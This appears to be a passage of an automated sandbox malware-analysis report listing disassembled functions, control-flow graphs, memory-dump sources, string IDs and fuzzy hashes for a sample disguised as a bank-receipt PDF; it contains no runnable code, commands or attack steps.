                                                                                                                control_flow_graph 758 14729ec-14729f6 760 1472981-147298a 758->760 761 14729f8-1472a01 758->761 762 1472990-1472999 760->762 761->762 763 1472a03-1472a3b 761->763 768 14729a0-14729c8 762->768 766 1472a5d-1472a76 763->766 767 1472a3d-1472a5c 763->767 772 1472a79-1472aac 766->772 773 1472a78 766->773 775 1472ac7-1472acf 772->775 776 1472aae-1472ab5 772->776 773->772 779 1472ad2-1472ae6 775->779 777 1472ab7-1472abc 776->777 778 1472abe-1472ac5 776->778 777->779 778->779 782 1472afc-1472b04 779->782 783 1472ae8-1472aef 779->783 786 1472b06-1472b0a 782->786 784 1472af5-1472afa 783->784 785 1472af1-1472af3 783->785 784->786 785->786 788 1472b0c-1472b21 786->788 789 1472b6a-1472b6d 786->789 788->789 797 1472b23-1472b26 788->797 790 1472bb5-1472bbb 789->790 791 1472b6f-1472b84 789->791 792 14736b6 790->792 793 1472bc1-1472bc3 790->793 791->790 801 1472b86-1472b8a 791->801 798 14736bb-14736f0 792->798 793->792 795 1472bc9-1472bce 793->795 799 1473664-1473668 795->799 800 1472bd4 795->800 802 1472b45-1472b63 call 14702c8 797->802 803 1472b28-1472b2a 797->803 820 14736f2-147371d 798->820 821 147371f-1473881 798->821 805 147366f-14736b5 799->805 806 147366a-147366d 799->806 800->799 807 1472b92-1472bb0 call 14702c8 801->807 808 1472b8c-1472b90 801->808 802->789 803->802 809 1472b2c-1472b2f 803->809 806->798 806->805 807->790 808->790 808->807 809->789 810 1472b31-1472b43 809->810 810->789 810->802 820->821
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                • API String ID: 0-4015495023
                                                                                                                • Opcode ID: d0606abedbafad78206d78cb4ca3c1a04d1108a4281c1424989011a834a10f67
                                                                                                                • Instruction ID: b35adeb09da06ef43b699eef6bc7dbef251b33cdc17452d620c5cd29f4e24788
                                                                                                                • Opcode Fuzzy Hash: d0606abedbafad78206d78cb4ca3c1a04d1108a4281c1424989011a834a10f67
                                                                                                                • Instruction Fuzzy Hash: 38B12330E0031ACFCBA18F6884547EEBBB5FF85314F11456BC18A67265DB709D86CB92
                                                                                                                Function 014769AF Relevance: 2.9, Strings: 2, Instructions: 448COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 935 14769af-14769e6 936 1476fb1-1476fc1 935->936 937 14769ec-14769fa 935->937 941 14769fc-1476a0d 937->941 942 1476a28-1476a39 937->942 941->942 953 1476a0f-1476a1b 941->953 943 1476a3b-1476a3f 942->943 944 1476aaa-1476abe 942->944 945 1476a41-1476a4d 943->945 946 1476a5a-1476a63 943->946 1052 1476ac1 call 1476fc7 944->1052 1053 1476ac1 call 1476fc8 944->1053 949 1476a53-1476a55 945->949 950 1476ddb-1476e26 945->950 951 1476d6c 946->951 952 1476a69-1476a6c 946->952 948 1476ac7-1476acd 956 1476ad6-1476add 948->956 957 1476acf-1476ad1 948->957 958 1476d62-1476d69 949->958 1006 1476e2d-1476eac 950->1006 954 1476d71-1476dd4 951->954 952->951 959 1476a72-1476a91 952->959 953->954 955 1476a21-1476a23 953->955 954->950 955->958 960 1476ae3-1476afa 956->960 961 1476bcb-1476bdc 956->961 957->958 959->951 977 1476a97-1476a9d 959->977 960->961 968 1476b00-1476b0c 960->968 971 1476c06-1476c0c 961->971 972 1476bde-1476beb 961->972 975 1476bc4-1476bc6 968->975 976 1476b12-1476b7e 968->976 973 1476c27-1476c2d 971->973 974 1476c0e-1476c1a 971->974 972->973 987 1476bed-1476bf9 972->987 981 1476c33-1476c50 973->981 982 1476d5f 973->982 979 1476ec3-1476f26 974->979 980 1476c20-1476c22 974->980 975->958 1008 1476b80-1476baa 976->1008 1009 1476bac-1476bc1 976->1009 977->936 984 1476aa3-1476aa7 977->984 1033 1476f2d-1476fac 979->1033 980->958 981->951 1001 1476c56-1476c59 981->1001 982->958 984->944 989 1476eb1-1476ebc 987->989 990 1476bff-1476c01 987->990 989->979 990->958 1001->936 1005 1476c5f-1476c85 1001->1005 1005->982 1015 1476c8b-1476c97 1005->1015 1008->1009 1009->975 1019 1476c9d-1476d15 1015->1019 1020 1476d5b-1476d5d 1015->1020 1035 1476d17-1476d41 1019->1035 1036 1476d43-1476d58 1019->1036 1020->958 1035->1036 1036->1020 1052->948 1053->948
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o]q$Haq
                                                                                                                • API String ID: 0-903699183
                                                                                                                • Opcode ID: 550c0e10bb2df04510e00b8431687d669ca5d82d572dbe8f3f458c4ebc73efe3
                                                                                                                • Instruction ID: e5e58d90287232cf90c4baac01387ea99d2322accbc565bcaeb65871daee6b72
                                                                                                                • Opcode Fuzzy Hash: 550c0e10bb2df04510e00b8431687d669ca5d82d572dbe8f3f458c4ebc73efe3
                                                                                                                • Instruction Fuzzy Hash: 76029F70A006198FDB15DF69C854AAEBBF7BF88710F15856AE805DB3A5DF309D42CB80
                                                                                                                Function 06D10B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d69d938122a65271ede634dc52764476e12fc38cc16edcb82baad507749123a
                                                                                                                • Instruction ID: ba7a33541a916db660e21a3598211cf691cf980c1a50deb95d6805cf54fa2129
                                                                                                                • Opcode Fuzzy Hash: 6d69d938122a65271ede634dc52764476e12fc38cc16edcb82baad507749123a
                                                                                                                • Instruction Fuzzy Hash: 9172CD74E012299FDBA4DF69D984BEDBBB2BB49300F1481E9D408AB255DB749EC1CF40
                                                                                                                Function 06DBD620 Relevance: .3, Instructions: 300COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df6aeab2766f26e3204ae0fb2087ca6d0fd9c4c45629f4eeed5064b0228eafb4
                                                                                                                • Instruction ID: 342f5b780104ba88c8ac3b3ecfffa32e154a6cb40529627aaba9926a4f099b5d
                                                                                                                • Opcode Fuzzy Hash: df6aeab2766f26e3204ae0fb2087ca6d0fd9c4c45629f4eeed5064b0228eafb4
                                                                                                                • Instruction Fuzzy Hash: 28E1BC74E00218CFDB64DFA5D944B9DBBB2BF88300F2090AAD819A73A5DB355E85CF54
                                                                                                                Function 06D1F868 Relevance: .3, Instructions: 296COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 25f7554ac72a509da9149093afc2b2a3b6963c1199a786ae9d55132a5cb7106d
                                                                                                                • Instruction ID: 82225dec96cc728eaa2ef5cde27e9c0f1b2300afa440195633c11ce415cf145a
                                                                                                                • Opcode Fuzzy Hash: 25f7554ac72a509da9149093afc2b2a3b6963c1199a786ae9d55132a5cb7106d
                                                                                                                • Instruction Fuzzy Hash: ADE1B074E01218CFEB54DFA5D944B9DBBB2FF89304F2080AAD808AB295DB755E85CF50
                                                                                                                Function 06DBDCC0 Relevance: .3, Instructions: 292COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c641818849579735607b6978ca16fdb197ab4cb58817f8949e13c4ad01d9723e
                                                                                                                • Instruction ID: 37efcf2796e14c8869c6b5aa9b242b56cf1f8c971369670248bd1f70cafd778c
                                                                                                                • Opcode Fuzzy Hash: c641818849579735607b6978ca16fdb197ab4cb58817f8949e13c4ad01d9723e
                                                                                                                • Instruction Fuzzy Hash: 2BD19E74E01218CFDB54DFA5D944B9DBBB2FF89300F2090A9D409AB2A4DB349E85CF50
                                                                                                                Function 06D1AB50 Relevance: .3, Instructions: 268COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 17ae26f37e9baa0a84988f472d4783476fab590579ed07d31eefd0c64357d993
                                                                                                                • Instruction ID: 9b22125681332e879ca89e871dabcbffd8f77cb87c75a0f8765a798e4bcc7b0a
                                                                                                                • Opcode Fuzzy Hash: 17ae26f37e9baa0a84988f472d4783476fab590579ed07d31eefd0c64357d993
                                                                                                                • Instruction Fuzzy Hash: 5CC18D74E01218CFEB54DFA5D984B9DBBB2BF88300F1480A9D809AB365DB759E85CF50
                                                                                                                Function 06D1AFB0 Relevance: .2, Instructions: 220COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 235a6574d283616c219772d5c3718f63afa756d1b893383c40cebf71b2905b6d
                                                                                                                • Instruction ID: f2708ea4b056bdddeb18c2689ef593c362f8009447bd4293b5a2a373f62ab70c
                                                                                                                • Opcode Fuzzy Hash: 235a6574d283616c219772d5c3718f63afa756d1b893383c40cebf71b2905b6d
                                                                                                                • Instruction Fuzzy Hash: 10A1F470D00208DFEB14DFA9D548BEDBBB1FF49310F20826AE419AB2A1DB749985CF51
                                                                                                                Function 06D1B2F6 Relevance: .2, Instructions: 202COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7ee69fbea37cc660bbe5ed028dee9d8efc69f897dfb19e73dc6b4a25cb4a371
                                                                                                                • Instruction ID: 1ed089c2e3d5d8eb87e749fe083dc45357891d12360864216c904d56ea5576b5
                                                                                                                • Opcode Fuzzy Hash: d7ee69fbea37cc660bbe5ed028dee9d8efc69f897dfb19e73dc6b4a25cb4a371
                                                                                                                • Instruction Fuzzy Hash: A791F570D00208DFEB50DFA9D548BEDBBB1FF49310F20926AE509AB291DB749985CF54
                                                                                                                Function 0147E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3525ca76a0dbc20131b124a27752413c5e415f4f14d22f3dad174d3db9170dc9
                                                                                                                • Instruction ID: bea830040962aa4df1695f9f5176e8b0c8353c18098a461ca10156efe45dc489
                                                                                                                • Opcode Fuzzy Hash: 3525ca76a0dbc20131b124a27752413c5e415f4f14d22f3dad174d3db9170dc9
                                                                                                                • Instruction Fuzzy Hash: 6651B474E00208DFEB18DFAAD584A9DBBB6FF89300F24816AE815BB365DB345845CF14
                                                                                                                Function 0147E987 Relevance: .1, Instructions: 143COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0d9c47ebba780d303b2e75efb41f4ae3b8692b85d7bd718d87bc834c9aa2921
                                                                                                                • Instruction ID: cd9b95da7afdc9bb26d27f074f67ee310d06ae57f656cc9507f4ffb214c25c8b
                                                                                                                • Opcode Fuzzy Hash: d0d9c47ebba780d303b2e75efb41f4ae3b8692b85d7bd718d87bc834c9aa2921
                                                                                                                • Instruction Fuzzy Hash: 56519274E00208DFDB18DFAAD584A9EBBB2FF88300F24816AE815BB365DB345845CF14
                                                                                                                Function 06DBD60F Relevance: .1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 28f81757354f7e820a43ffee09a6e9c7cc0b863428f330908252818a370a1672
                                                                                                                • Instruction ID: 08c2538b03ee3f95c2fccb4d875731007f953622759f4cc3af44dddf4f5c8347
                                                                                                                • Opcode Fuzzy Hash: 28f81757354f7e820a43ffee09a6e9c7cc0b863428f330908252818a370a1672
                                                                                                                • Instruction Fuzzy Hash: 5151A0B0D01208CBEB58DFAAD8447EEBBF2AF89304F24D06AD419BB254DB754945CF64
                                                                                                                Function 06DBDCBD Relevance: .1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506837101.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6db0000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 403c0ec377a27afb6daf123440c30d88f903d51fc125fd4890dc96dc4123bfbb
                                                                                                                • Instruction ID: 2ff22b0d35924b08b31ffd6bc6fcbe1b9c39c7f89833f659a28ceac5c94a65fd
                                                                                                                • Opcode Fuzzy Hash: 403c0ec377a27afb6daf123440c30d88f903d51fc125fd4890dc96dc4123bfbb
                                                                                                                • Instruction Fuzzy Hash: 0441A070E01218CFDB58DFAAD9446DEBBF2BF89300F24D06AD419AB258EB345946CF50
                                                                                                                Function 014776F8 Relevance: 10.4, Strings: 8, Instructions: 448COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 14776f8-1477725 1 1477b54-1477b58 0->1 2 147772b-147774e 0->2 3 1477b71-1477b7f 1->3 4 1477b5a-1477b6e 1->4 11 1477754-1477761 2->11 12 14777fc-1477800 2->12 9 1477b81-1477b96 3->9 10 1477bf0-1477c05 3->10 18 1477b9d-1477baa 9->18 19 1477b98-1477b9b 9->19 20 1477c07-1477c0a 10->20 21 1477c0c-1477c19 10->21 26 1477763-147776e 11->26 27 1477770 11->27 13 1477802-1477810 12->13 14 1477848-1477851 12->14 13->14 32 1477812-147782d 13->32 22 1477c67 14->22 23 1477857-1477861 14->23 28 1477bac-1477bed 18->28 19->28 29 1477c1b-1477c56 20->29 21->29 33 1477c6c-1477c82 22->33 23->1 24 1477867-1477870 23->24 30 1477872-1477877 24->30 31 147787f-147788b 24->31 34 1477772-1477774 26->34 27->34 72 1477c5d-1477c64 29->72 30->31 31->33 39 1477891-1477897 31->39 58 147782f-1477839 32->58 59 147783b 32->59 34->12 41 147777a-14777dc 34->41 42 1477b3e-1477b42 39->42 43 147789d-14778ad 39->43 85 14777e2-14777f9 41->85 86 14777de 41->86 42->22 46 1477b48-1477b4e 42->46 56 14778c1-14778c3 43->56 57 14778af-14778bf 43->57 46->1 46->24 60 14778c6-14778cc 56->60 57->60 61 147783d-147783f 58->61 59->61 60->42 67 14778d2-14778e1 60->67 61->14 68 1477841 61->68 69 14778e7 67->69 70 147798f-14779ba call 1477538 * 2 67->70 68->14 74 14778ea-14778fb 69->74 87 1477aa4-1477abe 70->87 88 14779c0-14779c4 70->88 74->33 75 1477901-1477913 74->75 75->33 77 1477919-1477931 75->77 141 1477933 call 14780d7 77->141 142 1477933 call 14780d8 77->142 81 1477939-1477949 81->42 84 147794f-1477952 81->84 89 1477954-147795a 84->89 90 147795c-147795f 84->90 85->12 86->85 87->1 110 1477ac4-1477ac8 87->110 88->42 91 14779ca-14779ce 88->91 89->90 92 1477965-1477968 89->92 90->22 90->92 95 14779f6-14779fc 91->95 96 14779d0-14779dd 91->96 97 1477970-1477973 92->97 98 147796a-147796e 92->98 100 1477a37-1477a3d 95->100 101 14779fe-1477a02 95->101 113 14779df-14779ea 96->113 114 14779ec 96->114 97->22 99 1477979-147797d 97->99 98->97 98->99 99->22 106 1477983-1477989 99->106 103 1477a3f-1477a43 100->103 104 1477a49-1477a4f 100->104 101->100 107 1477a04-1477a0d 101->107 103->72 103->104 111 1477a51-1477a55 104->111 112 1477a5b-1477a5d 104->112 106->70 106->74 108 1477a0f-1477a14 107->108 109 1477a1c-1477a32 107->109 108->109 109->42 115 1477b04-1477b08 110->115 116 1477aca-1477ad4 call 14763e0 110->116 111->42 111->112 117 1477a92-1477a94 112->117 118 1477a5f-1477a68 112->118 119 14779ee-14779f0 113->119 114->119 115->72 122 1477b0e-1477b12 115->122 116->115 129 1477ad6-1477aeb 116->129 117->42 120 1477a9a-1477aa1 117->120 125 1477a77-1477a8d 118->125 126 1477a6a-1477a6f 118->126 119->42 119->95 122->72 127 1477b18-1477b25 122->127 125->42 126->125 132 1477b27-1477b32 127->132 133 1477b34 127->133 129->115 138 1477aed-1477b02 129->138 135 1477b36-1477b38 132->135 133->135 135->42 135->72 138->1 138->115 141->81 142->81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                                • API String ID: 0-1435242062
                                                                                                                • Opcode ID: 4d43e418c2315365fa80f5fac1a22d214f513b8bed3c0f46bea6bb5b7a005874
                                                                                                                • Instruction ID: 653282927ad2797cc915822b6d3bbf38b16facb87aa8184eb68183e48b47567d
                                                                                                                • Opcode Fuzzy Hash: 4d43e418c2315365fa80f5fac1a22d214f513b8bed3c0f46bea6bb5b7a005874
                                                                                                                • Instruction Fuzzy Hash: F0126830A006098FCB25CF69D988AEEBBF6FF48315F54856AE5059B371D730E941CB90
                                                                                                                Function 01475F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Haq$Haq
                                                                                                                • API String ID: 0-4016896955
                                                                                                                • Opcode ID: a849e4d8fdc3d5679a839870c14dcab5ac5ad69ecd37c35b899c3fbb3e9aea18
                                                                                                                • Instruction ID: 3ea58a39440e24bc2206374c0de11da21664b50a10026b692f29230ac411624d
                                                                                                                • Opcode Fuzzy Hash: a849e4d8fdc3d5679a839870c14dcab5ac5ad69ecd37c35b899c3fbb3e9aea18
                                                                                                                • Instruction Fuzzy Hash: 8891B2703042418FEB169F28D8586BF7BB7BF89210F05856AE4468B3A6CF74CD02C791
                                                                                                                Function 01476498 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,aq$,aq
                                                                                                                • API String ID: 0-2990736959
                                                                                                                • Opcode ID: ca25ea3f4d3e23abea77161cb4813ba18014218b444e94cc0e41d869d8d533d6
                                                                                                                • Instruction ID: c8b6bded95831cf4ec82ba693468304adc6a283b8a9b5c77b113e5aa99b66f8f
                                                                                                                • Opcode Fuzzy Hash: ca25ea3f4d3e23abea77161cb4813ba18014218b444e94cc0e41d869d8d533d6
                                                                                                                • Instruction Fuzzy Hash: 7171B070A00906CFEB18CF6DC4849EEBBB3BF88600B96856AD509A7375D731E845CF51
                                                                                                                Function 01473CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xaq$Xaq
                                                                                                                • API String ID: 0-1488805882
                                                                                                                • Opcode ID: 46c81df74576a5ce0d8b28f53c9fad98ecfde2bab6c3838202f70b6eed4c5e18
                                                                                                                • Instruction ID: e95564114200dc40532e2a6ba9f75089a4909c047c8a70f37387d3133b7632d4
                                                                                                                • Opcode Fuzzy Hash: 46c81df74576a5ce0d8b28f53c9fad98ecfde2bab6c3838202f70b6eed4c5e18
                                                                                                                • Instruction Fuzzy Hash: ED31C8327402258BEF184D6E99942FFA6AABBC4210F14443BD917D33A4DBB5CC46A791
                                                                                                                Function 01478EF8 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q
                                                                                                                • API String ID: 0-127220927
                                                                                                                • Opcode ID: ebc03d34e7f47a27cdf9a142049fee5f4c3cd83b2154641f16ae371224f1f5af
                                                                                                                • Instruction ID: dc00a73ccd5c63ca7896fdd4f33ef90a68e7172ce38c6bc2d0ef94e80408ea54
                                                                                                                • Opcode Fuzzy Hash: ebc03d34e7f47a27cdf9a142049fee5f4c3cd83b2154641f16ae371224f1f5af
                                                                                                                • Instruction Fuzzy Hash: 953154303041538FD7368B6D88A8ABF7B67AB847107144557E212DB372EA79CC418755
                                                                                                                Function 01479D57 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q
                                                                                                                • API String ID: 0-3120983240
                                                                                                                • Opcode ID: 543e49e7e0e4941acff32bb55124e51e8d18d99c65a37279f5f008c7f067d77f
                                                                                                                • Instruction ID: 8821d5fdd6dec80dc7a8355bfb4cacde84ecf9d1238b3ba467791f4e76f87321
                                                                                                                • Opcode Fuzzy Hash: 543e49e7e0e4941acff32bb55124e51e8d18d99c65a37279f5f008c7f067d77f
                                                                                                                • Instruction Fuzzy Hash: 62F086353002056FDB191A6A98509BBABEBEFDC370B14852AA909C7360DE758C018761
                                                                                                                Function 01470C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR]q
                                                                                                                • API String ID: 0-3081347316
                                                                                                                • Opcode ID: cf58f580a433cde0ce5ce4f646eba4e2f8717462e55cca6d6dff2d9a020bbe98
                                                                                                                • Instruction ID: 1a3337397089714974db65e4dbd341af15384cb1dd7c703e19ef228f077ac8a0
                                                                                                                • Opcode Fuzzy Hash: cf58f580a433cde0ce5ce4f646eba4e2f8717462e55cca6d6dff2d9a020bbe98
                                                                                                                • Instruction Fuzzy Hash: 3E52C774A01219DFCB64DF24E994A9DBBB2FF48301F5085A9D809A7368DF785E85CF80
                                                                                                                Function 01470C99 Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR]q
                                                                                                                • API String ID: 0-3081347316
                                                                                                                • Opcode ID: d519af788e721be03f679d5a32544c6b5a7280222da1f79dbb5c89157e42a57a
                                                                                                                • Instruction ID: 48269559a7cf71da99bb4c6dee1362f1fcd56041af6eaeb9835afaadb05df26a
                                                                                                                • Opcode Fuzzy Hash: d519af788e721be03f679d5a32544c6b5a7280222da1f79dbb5c89157e42a57a
                                                                                                                • Instruction Fuzzy Hash: E852C874A01219DFCB64DF24E994A9DBBB2FF48301F5085A9D809A7368DF785E85CF80
                                                                                                                Function 01470CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
